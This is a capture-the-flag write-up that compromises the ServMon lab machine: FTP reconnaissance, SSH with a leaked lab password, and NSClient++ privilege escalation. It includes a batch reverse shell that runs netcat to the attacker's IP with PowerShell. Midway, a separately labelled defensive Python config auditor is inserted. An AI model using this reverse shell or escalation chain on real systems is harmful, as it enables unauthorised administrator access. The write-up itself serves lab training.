ServMon HTB Writeup
Hello,
This time I am writing the solution for the ServMon box, an easy Windows box. Let's dive into the solution.
🔥 nmap to get the open ports.
```
nmap -sC -sV -oA initial -Pn 10.10.10.184
```
The results:
```
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5666/tcp open tcpwrapped
6699/tcp open tcpwrapped
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
|_ Location: /index.html
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=
```
First of all, the port I look at is FTP, because anonymous access is allowed. There is a directory named `Users`, and inside it two directories, `Nadine` and `Nathan`, containing the files `Confidential.txt` and `Notes to do.txt` respectively. It is a good idea at this point to take note of these two usernames.
The content of `Confidential.txt`:
```
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
```
I keep in the back of my mind that there is a file named `Passwords.txt` in Nathan's Desktop folder.
And `Notes to do.txt`:
```
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
```
There are some incomplete to-dos, such as removing public access to NVMS. Remember port 80? Let's take a look at that.
So this confirms the 4th to-do item. I try to log in with `admin` as both username and password, but nothing. At this point, because I don't have a password, I search for known vulnerabilities.
I open Burp, navigate to 10.10.10.184, intercept the request and then send it to Repeater (Ctrl+R).
And indeed this works. Now, if you remember from `Confidential.txt`, there is a file with passwords. I get that file.
After trying each of these passwords over SSH, the password `L1k3B1gBut7s@W0rk` worked.
```
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>
```
We can get user flag now.
After searching the box for hints towards root, I find nothing. Going back to nmap, we can see port 8443 open with an SSL certificate. Visiting the site brings up NSClient++.
Searching with searchsploit shows there is a privilege escalation exploit for it.
First we need to get the password of the client from the file `c:\program files\nsclient++\nsclient.ini`:
```
; Undocumented key
password = ew2x6SsGTxjRwXOT
```
But the password does not work, giving us a 403.
Going back to the `nsclient.ini` file, I see there is a setting that only allows connections from 127.0.0.1:
```
; Undocumented key
allowed hosts = 127.0.0.1
```
Because I am using SSH, I can create a local tunnel from my host to NSClient++ and then access it as if I were on the box itself. To do this I use a [trick](https://www.sans.org/blog/using-the-ssh-konami-code-ssh-control-sequences/) to open something like a hidden menu in the running SSH session, and then enter
`-L 8443:127.0.0.1:8443`. Then I go to my browser and access the website at `https://localhost:8443`.
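Reading the same configuration from the defender's side: the three things this writeup chains together (a cleartext web UI password readable by a low-privileged user, a loopback-only `allowed hosts` that an SSH port forward lands inside of, and the CheckExternalScripts/Scheduler modules) can be checked mechanically. This is an added example, not code from the post or from NSClient++; the INI text is constructed from the keys quoted above, and the `[/settings/default]` / `[/modules]` section layout and the `10.0.0.50` monitoring host in the hardened variant are my assumptions.

```python
import configparser
import ipaddress
from typing import List, Tuple

# Constructed sample: the two keys quoted in the writeup plus the modules the
# writeup enables. Section names follow NSClient++'s layout as I understand it (assumption).
WEAK_INI = """[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1

[/modules]
WEBServer = enabled
CheckExternalScripts = enabled
Scheduler = enabled
"""

# Same file with the command-execution modules off and one specific (constructed) monitoring host allowed.
HARDENED_INI = (WEAK_INI.replace("127.0.0.1", "10.0.0.50")
                .replace("CheckExternalScripts = enabled", "CheckExternalScripts = disabled")
                .replace("Scheduler = enabled", "Scheduler = disabled"))

def _is_loopback(host: str) -> bool:
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:  # hostnames: only 'localhost' is treated as loopback
        return host.lower() == "localhost"

def audit(ini_text: str) -> List[Tuple[str, str]]:
    """Return (code, advice) findings for the weaknesses the writeup chains together."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case such as 'CheckExternalScripts'
    cp.read_string(ini_text)
    default = cp["/settings/default"] if cp.has_section("/settings/default") else {}
    modules = cp["/modules"] if cp.has_section("/modules") else {}
    def on(key: str) -> bool:
        return modules.get(key, "disabled").strip().lower() in ("enabled", "1", "true")
    findings = []
    if default.get("password"):
        findings.append(("CLEARTEXT_PASSWORD", "any local user who can read nsclient.ini learns the web UI password; restrict the file ACL"))
    hosts = [h.strip() for h in default.get("allowed hosts", "").split(",") if h.strip()]
    if hosts and all(_is_loopback(h) for h in hosts):
        findings.append(("LOOPBACK_ONLY_ALLOWLIST", "loopback-only allow list is bypassed by any user who can SSH in and forward a port"))
    if on("CheckExternalScripts"):
        findings.append(("EXTERNAL_SCRIPTS_ENABLED", "web UI can register scripts that run with the service's privileges"))
        if on("Scheduler"):
            findings.append(("SCHEDULER_WITH_EXTERNAL_SCRIPTS", "scheduler runs those scripts unattended; disable unless needed"))
    return findings
```

Run against `WEAK_INI` it reports all four findings; the hardened variant only keeps the cleartext-password note, because the web UI still needs a password and file permissions are what protect it.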
I now create a .bat script:
```
@echo off
C:\Temp\nc.exe 10.10.14.52 9854 -e powershell
```
and upload it alongside nc.exe into `C:\Temp\`, then set up a listener on my local box.
Next step is to enable two modules:
- CheckExternalScripts
- Scheduler
Afterwards I create an external script with the following key and value (replace fuxsocy.bat with your .bat filename).
data:image/s3,"s3://crabby-images/0f6b6/0f6b6ecfe384407030340d130e04c33303a5b79d" alt="extscript"
Next I set it up to run every minute.
data:image/s3,"s3://crabby-images/e9643/e9643f12363430e314704c5387467f7cfa763e3a" alt="timer"
and specify the command, which in our case is `rce`, the name of the external script that will execute the command.
data:image/s3,"s3://crabby-images/9101a/9101a4b4ff40d23dff693c2a93333a6a072c4f59" alt="rce"
Then I save the changes under the `Changes` button and reset the service under the `Control` button. I wait 1-2 minutes and get a shell as administrator.
data:image/s3,"s3://crabby-images/b76c2/b76c2dc1ef97f32b1baa1dc1477847c21fb09d44" alt="shell_as_admistrator"